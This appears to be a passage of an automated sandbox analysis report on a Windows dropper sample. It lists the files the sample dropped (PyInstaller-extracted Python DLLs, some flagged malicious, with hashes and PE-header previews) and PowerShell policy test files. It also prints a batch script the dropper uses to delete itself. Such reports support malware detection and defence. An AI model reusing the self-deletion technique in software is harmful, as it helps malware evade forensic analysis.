                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t]..................................................c.............t......t......t......t......Rich...........PE..L.....Tb...........!.....N..........N........`...............................P............@.............................d.......d............................ ... ..p{...............................{..@............`...............................text....M.......N.................. ..`.rdata...1...`...2...R..............@..@.data....i.......b..................@....rsrc...............................@..@.reloc... ... ..."..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pyd

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):546816
                                                                                                                  Entropy (8bit):6.369403940782478
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:m9bzx/z9ZFyZri7Oh9UuVTRak3bV/DzPbsI:sbJ/ujh1gyhLzP
                                                                                                                  MD5:64DAFFD976F2FBFB6D586249F6C15636
                                                                                                                  SHA1:420A215F757C342967A3E481B899978BB4000849
                                                                                                                  SHA-256:0D4871F762E97F34972DD824FCFDE4EE92431EA406B0C8BFDE0F42C6851D1E1C
                                                                                                                  SHA-512:19C464673726E9707588B00DB459E40D48A8913B97E6321D4509B2B7FDDF3DEF7C38D64461EF9E32418DDDB4984F0C3B1CA504636D86ED0773DE4EEBA7DDC73E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........bu...&...&...&..&..&...'...&&..'...&...'...&...'...&...'...&_..'...&...&...&H..'...&H..'...&H..'...&H..&...&H..'...&Rich...&................PE..L.....Tb...........!.....4...4.......@.......P............................................@....................................x....P.......................`...A..,...............................H...@............P..h............................text...a2.......4.................. ..`.rdata...q...P...r...8..............@..@.data...4|.......j..................@....rsrc........P......................@..@.reloc...A...`...B..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pyd

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65024
                                                                                                                  Entropy (8bit):6.418545771784273
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:KzQX/CKot2BIQE9yqHnICq3ixGwBtAgUTaP/tG9xBDgYp5BZfP/I7v/X2oMFW7Hj:5ZiJQsLq0zAgU2PVG8R7HL
                                                                                                                  MD5:1A961EB78F34CC6B43800299F0534294
                                                                                                                  SHA1:57076255DC72BA0AFC2144510AF702693B0994BE
                                                                                                                  SHA-256:F57E42BFAF5438811318DF2D4342FB53B347C20DC8E66625A73745731446332B
                                                                                                                  SHA-512:245D611F208253162C71556C596A311C44FC1675C88D76BB00CB0C08E52ABD04BB0CDD14A38DECD9B2EAE4D113A7AB76C34DDEC10B34CBD7E6B83D098B4C663E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S..m..t>..t>..t>...>..t>E.u?..t>E.q?..t>E.p?..t>E.w?..t>..u?..t>\.u?..t>..u>..t>..|?..t>..t?..t>..>..t>..v?..t>Rich..t>................PE..L.....=d...........!.........^......$........................................0............@.............................`......@.......................................................................@............................................text............................... ..`.rdata..B...........................@..@.data....-.......*..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\pyexpat.pyd

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):162320
                                                                                                                  Entropy (8bit):6.65421740486783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:hEw+wyQnYUzXtwzXcVhuDMQaK/DS3L7vJ7UQvIdc0nbjYLjVtlQ7thdI8VhlIl:LKLYh7QdOLjlQ7thm
                                                                                                                  MD5:187CDD3E6152D56986BB523C3A0F7D3E
                                                                                                                  SHA1:ACA59C23E4E4974C37378BC7A2F365467E25C245
                                                                                                                  SHA-256:7F22B82BFFB4BD87C8C5DC3357C25B5714264B46CE05F6DC8C1FC4C579DCA5FD
                                                                                                                  SHA-512:C0612FB2F5D560055FFB3EC239DD4A8B06EDECE59E1C35AF2DA0E5D142643E6FC22FF4F1255CD620092D59958F758B790331163869480AA416026C374193C952
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P/h.1A;.1A;.1A;.I.;.1A;.o@:.1A;.oB:.1A;.oD:.1A;.oE:.1A;.o@:.1A;.Y@:.1A;.1@;.1A;.oI:.1A;.oA:.1A;.o.;.1A;.oC:.1A;Rich.1A;........PE..L...@.:_...........!................(...............................................Y.....@..........................*..P....+.......p...............`...............&..T...........................8'..@............................................text............................... ..`.rdata...F.......H..................@..@.data........@.......&..............@....gfids.......`.......4..............@..@.rsrc........p.......6..............@..@.reloc...............B..............@..B................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\python3.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):58896
                                                                                                                  Entropy (8bit):5.838216038576758
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:PSvcU+4AjLLDRp9VpBLm6g5YuLIE4k8kF/DFz1OuIwfBSCciqy0oeDOm+FERdI8h:avf+/La5gO6dI8V0lyR
                                                                                                                  MD5:167EBEFCF1A2CB0CE7F4118FE826F58B
                                                                                                                  SHA1:5D532467D78DCC2B63848452C4F600513B4136CF
                                                                                                                  SHA-256:112C98099E5E6156A8844C6C39B2136F3146E1F2221C37B9064AB7AF6FDFABB7
                                                                                                                  SHA-512:BCD67BF4F7E5ADBD8E06A28FE3F805F79323369FBE3F37D32A513AA0336F6FFD4E1C7D978FA0480742BA1AE5D91CEB2E255E9D7033D00670E738335387F92E22
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5H..q)d.q)d.q)d..wl.p)d..wd.p)d..w..p)d..wf.p)d.Richq)d.........PE..L...,.:_...........!......................... ............................................@.........................` ..,............................................ ..T............................................................................text............................... ..`.rdata..T.... ......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3441168
                                                                                                                  Entropy (8bit):6.692336437440565
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:pEzrIHYnNScEE+Nt9I2RVu5121Cd6vIR57HPNMZnhPsNkTkx2s2MYu4YpZc2j:cBE7/Rag2RhHVMZ6NJF2E4aj
                                                                                                                  MD5:465089EACED8159EC533E4A37033E227
                                                                                                                  SHA1:074596ADAE6F53F33B8297F02E21F6A6F7AC6FF1
                                                                                                                  SHA-256:2B29AE140CB9F08AF872ACF9E17F785EF99398EF3367549B55242BC064D6AE40
                                                                                                                  SHA-512:55ECA0922074162C22FFF2B4F97BD2972540FA893B9B02B7D9BFA26345186DBBDAF1FBC37A9EBA6366743D0D42FB5BB88E708877DFD57CB02CA4D3A6953CFB81
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........->..LP.LP.LP.4..LP..Q.LP.4..LP..S.LP..U.LP..T.LP..$Q.LP.LQ..MP...X.jLP...P.LP.....LP...R.LP.Rich.LP.........PE..L...".:_...........!.........D......-........................................P6.......4...@...........................+......,.|....`4..............h4......p4.X.....+.T...........................(.+.@............................................text............................... ..`.rdata..<...........................@..@.data...`s....,.......,.............@....gfids.......P4.......2.............@..@.rsrc........`4.......2.............@..@.reloc..X....p4.......2.............@..B................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\select.pyd

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23568
                                                                                                                  Entropy (8bit):6.3163367160293795
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:CP0MtNXsSBoYssphKfkOgJYgTiwO5xOJ9qsTdI8qG5inYPLxDG4y827DM:i0ot6YsckkrOgnOmJ9qsTdI8qGcWDG4J
                                                                                                                  MD5:D3BF89184B94A4120F4F19F5BCD128D6
                                                                                                                  SHA1:C7F22BB0B957BD7103CF32F8958CFD2145EAA5B8
                                                                                                                  SHA-256:568EFDC33F1FCC1AF1D030C75FCCEDC2D9B1FCBF49C239726E2CF49D47ADD902
                                                                                                                  SHA-512:1DA8EBF323D170C5E9F6BFBB738E60119CCC690A08234DD23F2D9C1A33519FD4AD154805B012CCA3DC7565BEE672D334CA877AFE2B5211E2122DD6E1CE337971
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...Fb..Fb..Fb..>...Fb...c..Fb...a..Fb...g..Fb...f..Fb.+.c..Fb...c..Fb..Fc..Fb.+.j..Fb.+.b..Fb.+....Fb.+.`..Fb.Rich.Fb.........PE..L...>.:_...........!.........*......2........0......................................NL....@..........................5..L....5..x....`...............B.......p..t....1..T...........................(2..@............0...............................text............................... ..`.rdata..8....0......................@..@.data...p....@.......*..............@....gfids.......P.......0..............@..@.rsrc........`.......2..............@..@.reloc..t....p.......>..............@..B................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\ucrtbase.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):914584
                                                                                                                  Entropy (8bit):6.825568092802891
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:zadFmfYOLU7712zo2TeW04aoVmcvIZPoy4HHJ:udFlHuSPaHJ
                                                                                                                  MD5:A924B24D71829DA17E8908E05A5321E4
                                                                                                                  SHA1:FA5C69798B997C34C87A8B32130F664CDEF8C124
                                                                                                                  SHA-256:F32A61D91264AFF96EFD719915BED80785A8DB4C8D881D6DA28909B620FE466F
                                                                                                                  SHA-512:9223EC0E6E0F70B92473E897E4FD4635A19E9CA3AFF2FE7C5C065764B58E86460442991787525ED53E425ECD36F2881A6DF34C35D2A0E21B7AC4BC61BF1CBEAB
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`.M.............yf.........Z...........\.......\.......\.......\.......\.......\.......\......Rich............PE..L...Y..\...........!.....,..........P........@.......................................e....@A.........................^.......b.......... ................@.......Y..p...8...........................H...@............`...............................text....+.......,.................. ..`.data...$....@.......0..............@....idata..j....`.......>..............@..@.rsrc... ............T..............@..@.reloc...Y.......Z...Z..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pyd

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1063440
                                                                                                                  Entropy (8bit):5.335145703200824
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:q3eYbeoEYa6l0SYx7tHcQJPREI+V/IF+7agsSJNzkRoEVCTRPmrZ6wBj:q3eBN6axxcCr+VU+7agnNcITRopp
                                                                                                                  MD5:22EE48112415EE74C80B66CC1A8E1CA8
                                                                                                                  SHA1:9EB11B06BA0EA22A2F339D0CE300F45F48607D4C
                                                                                                                  SHA-256:8F38B8891C74DA4AF150B60D21053CDA95A61881C61B8FFF1C8852885DE8B2AF
                                                                                                                  SHA-512:080DA19FCBFCFDD55BCCF231F6F4820204707AE3A08DE7E40CE8E1F87DF1EDD916FD55A37E6560C1E1A6935DDC42D47DCE82AA834A8287B024D907CC9B98B3CE
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,F..B...B...B......B..C...B..A...B..G...B..F...B.u.C...B...C...B...C...B.u.J...B.u.B...B.u.....B.u.@...B.Rich..B.........PE..L...?.:_...........!.....4...........4.......P...............................`......V.....@..........................Q..X...HR.......@............... .......P.......N..T...........................XN..@............P...............................text...N2.......4.................. ..`.rdata.......P.......8..............@..@.data...(....`.......B..............@....gfids.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25mco3kt.xbd.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b555o43w.a23.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgdjwypv.0pt.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4051ixe.cyz.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzl40m0q.i50.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_koxaxjrp.cfk.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qh5wqzyl.exg.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcrpqlw1.m00.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rohkf0xg.d5f.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_td1bg2h4.t54.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thfrhn2p.lkc.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrofhapz.yaf.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\selfdelete.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):5.014649811151128
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:2EKDD67Ot+WfW2AHWea/u2LWmTWMD2Ut+WfW2AHWea/u2LWmT8KReGvxn:0WKwv2sLsWmSMD2Uwv2sLsWmYCn
                                                                                                                  MD5:1AE7F173FD900FCB8EE7B29A58316E15
                                                                                                                  SHA1:E67B53EDD5110009732CCF2156ECD4C7E595B217
                                                                                                                  SHA-256:F3DA303EFA30F74A05272DF86AB6D3738254D209D30053B65C44458021551D6F
                                                                                                                  SHA-512:BEBBD24DB0FC6F19A56F4EEAE9AA65F637D8313F074EF6D841EEF644DEA9C12B3E63128E9BAEFDAD2CD75D217AA744660C7D131F0EE61FB7F88F2C9D9069D336
                                                                                                                  Malicious:false
                                                                                                                  Preview:..@echo off..:loop..del "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe"..if exist "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe" goto loop..del %0

                                                                                                                  C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\ProgramData\Microsoft\Bound.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):137
                                                                                                                  Entropy (8bit):5.1375617365277355
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDGMLCuXSLVLxxFkhgXZkRErG+fnF4AHyBkZOt+kiE2J5xAIynQKnn:hSKDXSLpnWhgGaPFNSKowkn23f0QAn
                                                                                                                  MD5:269B1F8841C103F21CAC92ECF4CEF45D
                                                                                                                  SHA1:A28E9DDE2274C5FF1D19042BA7F1936DA4318C43
                                                                                                                  SHA-256:31AACE1B9CC2166D932388AA02E542943AEE7CFA5420925F4AC5F3E1FF8BA8BD
                                                                                                                  SHA-512:11E558DFAF0DDE09711AF52390D48A19DD69585F573A521CD030712299F59B3884315787B45B38BCCE22D3D8BA1F7F5CC2842F969D25DC2FF4F9DBAF6E55DE69
                                                                                                                  Malicious:false
